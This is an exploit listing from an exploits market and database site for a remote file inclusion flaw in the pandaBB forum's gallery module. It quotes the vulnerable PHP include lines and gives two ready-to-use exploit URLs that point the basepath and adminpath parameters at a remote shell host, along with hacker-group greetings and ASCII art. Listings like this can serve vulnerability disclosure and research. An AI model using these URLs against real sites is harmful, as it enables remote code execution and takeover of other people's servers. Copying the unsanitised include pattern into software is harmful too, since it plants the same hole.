[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

pandaBB (displayCategory) Remote File Include Vulnerabilities

Author
nukedclx
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1028
Category
web applications
Date add
18-10-2006
Platform
unsorted
=============================================================
pandaBB (displayCategory) Remote File Include Vulnerabilities
=============================================================



:::::::::  :::::::::: :::     ::: ::::::::::: :::
:+:    :+: :+:        :+:     :+:     :+:     :+:
+:+    +:+ +:+        +:+     +:+     +:+     +:+
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+
+#+    +#+ +#+         +#+   +#+      +#+     +#+
#+#    #+# #+#          #+#+#+#       #+#     #+#
#########  ##########     ###     ########### ##########

::::::::::: ::::::::::     :::     ::::    ::::
    :+:     :+:          :+: :+:   +:+:+: :+:+:+
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+
    +#+     +#+        +#+     +#+ +#+       +#+
    #+#     #+#        #+#     #+# #+#       #+#
    ###     ########## ###     ### ###       ###

   - - [DEVIL TEAM THE BEST POLISH TEAM] - -

pandaBB (basepath;adminpath) Remote File Include
[Script name: pandaBB
[Script site: http://phpnuke.pl
Find by: nukedclx 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon & Kacper
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko., CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, SkD, MXZ, sysios, mIvus, wacky


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
in modules/My_eGallery/public/displayCategory.php

lines 1-3:
<?php
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");

%Exploit
        http://host/pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://sh3ll
        http://host/pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://sh3ll



#  0day.today [2024-12-24]  #